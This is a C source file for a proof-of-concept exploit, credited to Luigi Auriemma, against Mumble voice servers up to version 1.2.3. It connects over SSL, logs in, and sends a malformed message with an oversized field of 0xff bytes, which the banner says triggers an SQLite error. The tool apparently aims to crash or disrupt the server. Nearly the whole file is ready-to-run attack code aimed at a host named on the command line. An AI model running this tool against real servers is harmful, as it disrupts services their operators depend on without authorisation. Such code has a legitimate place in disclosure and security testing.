/*
  by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <openssl/ssl.h>    // link with libssl.a libcrypto.a -lgdi32

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
    #define strnicmp strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        64738
#define BUFFSZ      0xffff

#define SSL_CLOSE   SSL_shutdown(ssl_sd); \
                    SSL_free(ssl_sd); \
                    SSL_CTX_free(ctx_sd); \
                    close(sd);
#define SSL_COMP(X) SSL_CTX_set_cipher_list(X, "ALL"); \
                    SSL_CTX_set_options(X, SSL_OP_ALL);



int mysend(SSL *ssl_sd, int sd, u8 *data, int datasz);
int myrecv(SSL *ssl_sd, int sd, u8 *data, int datasz);
int mumble_send(SSL *ssl_sd, int sd, int type, u8 *data, int size);
int mumble_recv(SSL *ssl_sd, int sd, int *type, u8 *data, int max_size);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int putcc(u8 *data, int chr, int size);
int getmb(u8 *data, u32 *num);
int putmb(u8 *data, u32 num);
int putss(u8 *data, u8 *str, int type);
int putmm(u8 *data, u8 *mem, int size);
int recv_tcp(SSL *ssl_sd, int sd, u8 *data, int datalen);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    static struct   linger  ling = {1,1};
    const SSL_METHOD  *method;
    SSL_CTX *ctx_sd = NULL;
    SSL     *ssl_sd = NULL;
    struct  sockaddr_in peer;
    int     sd,
            len,
            try;
    u16     port    = PORT;
    u8      password[64] = "",
            *buff,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    fputs("\n"
        "Mumble server <= 1.2.3 SQLite error "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stderr);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%u)]\n"
            "\n", argv[0], port);
        exit(1);
    }
    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    SSL_library_init();
    //SSL_load_error_strings();

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(0xffff);
    if(!buff) std_err();

    for(try = 0;; try++) {
        switch(try) {
            case 0: method = SSLv3_method();    break;
            case 1: method = TLSv1_method();    break;
            case 2: method = SSLv2_method();    break;
            case 3: method = SSLv23_method();   break;
            default: {
                printf("\nError: unsupported SSL method or not a SSL connection\n");
                exit(1);
                break;
            }
        }
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
        if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
          < 0) std_err();

        ctx_sd = SSL_CTX_new(method);
        SSL_COMP(ctx_sd)
        ssl_sd = SSL_new(ctx_sd);
        SSL_set_fd(ssl_sd, sd);

        // mysend is necessary to guess if the ssl version is wrong
        if((SSL_connect(ssl_sd) < 0) || (mysend(ssl_sd, sd, "", 0) != 0)) {
            SSL_CLOSE
            printf("- try another SSL version\n");
        } else {
            break;
        }
    }

    len = mumble_recv(ssl_sd, sd, NULL, buff, BUFFSZ);
    if(len < 0) std_err();
    mumble_send(ssl_sd, sd, 0, buff, len);  // send version back, easy way

    /* alternative correct way
    p = buff;
    p += putxx(p, -1, 32);
    p += putss(p, "1.2.2", 0x12);
    p += putss(p, "Win", 0x1a);
    p += putss(p, "5.1.2500.1", 0x22);
    mumble_send(ssl_sd, sd, 0, buff, p - buff); */

    p = buff;
    p += putss(p, "myusername", 0x0a);
    p += putss(p, password, 0x12);
    p += putmb(p, 0x20);    p += putmb(p, 0);   // codec
    mumble_send(ssl_sd, sd, 2, buff, p - buff);

    p = buff;
    *p++ = 0x12;
    p += putmb(p, 0x7fff);
    p += putcc(p, 0xff, 0x7fff);
    mumble_send(ssl_sd, sd, 0xe, buff, p - buff);

    len = mumble_recv(ssl_sd, sd, NULL, buff, BUFFSZ);

    SSL_CLOSE
    printf("\n- done, check the server manually\n");
    return(0);
}



int mysend(SSL *ssl_sd, int sd, u8 *data, int datasz) {
    if(ssl_sd) return(SSL_write(ssl_sd, data, datasz));
    return(send(sd, data, datasz, 0));
}



int myrecv(SSL *ssl_sd, int sd, u8 *data, int datasz) {
    if(ssl_sd) return(SSL_read(ssl_sd, data, datasz));
    return(recv(sd, data, datasz, 0));
}



int mumble_send(SSL *ssl_sd, int sd, int type, u8 *data, int size) {
    u8      tmp[2 + 4];

    putxx(tmp, type, 16);
    putxx(tmp + 2, size, 32);
    if(mysend(ssl_sd, sd, tmp, 2 + 4) < 0) return(-1);
    if(size <= 0) return(0);
    return(mysend(ssl_sd, sd, data, size));
}



int mumble_recv(SSL *ssl_sd, int sd, int *type, u8 *data, int max_size) {
    u32     size;
    u8      tmp[2 + 4];

    if(recv_tcp(ssl_sd, sd, tmp,  2 + 4) < 0) return(-1);
    if(type) getxx(tmp, type, 16);
    getxx(tmp + 2, &size, 32);
    if(!size) return(0);
    if(size > max_size) return(-1); // lazy
    if(recv_tcp(ssl_sd, sd, data, size) < 0) return(-1);
    return(size);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << ((bytes - 1 - i) << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
    }
    return(bytes);
}



int putcc(u8 *data, int chr, int size) {
    memset(data, chr, size);
    return(size);
}



int getmb(u8 *data, u32 *num) {
    u32     result;
    u8      b,
            *ptr;

    result = 0;
    ptr = data;

    if(*ptr < 0x80) {
        result = *ptr;
    } else {
        b = *(ptr++); result  = (b & 0x7F)      ; if (!(b & 0x80)) goto done;
        b = *(ptr++); result |= (b & 0x7F) <<  7; if (!(b & 0x80)) goto done;
        b = *(ptr++); result |= (b & 0x7F) << 14; if (!(b & 0x80)) goto done;
        b = *(ptr++); result |= (b & 0x7F) << 21; if (!(b & 0x80)) goto done;
        b = *(ptr++); result |=  b         << 28; if (!(b & 0x80)) goto done;
    }
done:
    *num = result;
    return(ptr - data);
}



int putmb(u8 *target, u32 value) {
  if (value < (1 << 7)) {
    target[0] = value;
    return /*target + */1;
  } else if (value < (1 << 14)) {
    target[0] = (u8)(value | 0x80);
    target[1] = (u8)(value >> 7);
    return /*target + */2;
  } else {
  target[0] = (u8)(value | 0x80);
  if (value >= (1 << 7)) {
    target[1] = (u8)((value >>  7) | 0x80);
    if (value >= (1 << 14)) {
      target[2] = (u8)((value >> 14) | 0x80);
      if (value >= (1 << 21)) {
        target[3] = (u8)((value >> 21) | 0x80);
        if (value >= (1 << 28)) {
          target[4] = (u8)(value >> 28);
          return /*target + */5;
        } else {
          target[3] &= 0x7F;
          return /*target + */4;
        }
      } else {
        target[2] &= 0x7F;
        return /*target + */3;
      }
    } else {
      target[1] &= 0x7F;
      return /*target + */2;
    }
  } else {
    target[0] &= 0x7F;
    return /*target + */1;
  }
  }
}



int putss(u8 *data, u8 *str, int type) {
    u32     len;
    u8      *p;

    len = strlen(str);
    p = data;

    if(type >= 0) p += putmb(p, type);
    p += putmb(p, len);
    p += putmm(p, str, len);
    return(p - data);
}



int putmm(u8 *data, u8 *mem, int size) {
    memcpy(data, mem, size);
    return(size);
}



int recv_tcp(SSL *ssl_sd, int sd, u8 *data, int datalen) {
    int     len,
            t;

    for(len = 0; len < datalen; len += t) {
        if(!ssl_sd) {   // timeout can't be used with ssl because ssl is a layer over TCP
            if(timeout(sd, 10) < 0) return(-1);
        }
        t = myrecv(ssl_sd, sd, data + len, datalen - len);
        if(t <= 0) return(-1);
    }
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            fprintf(stderr, "\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


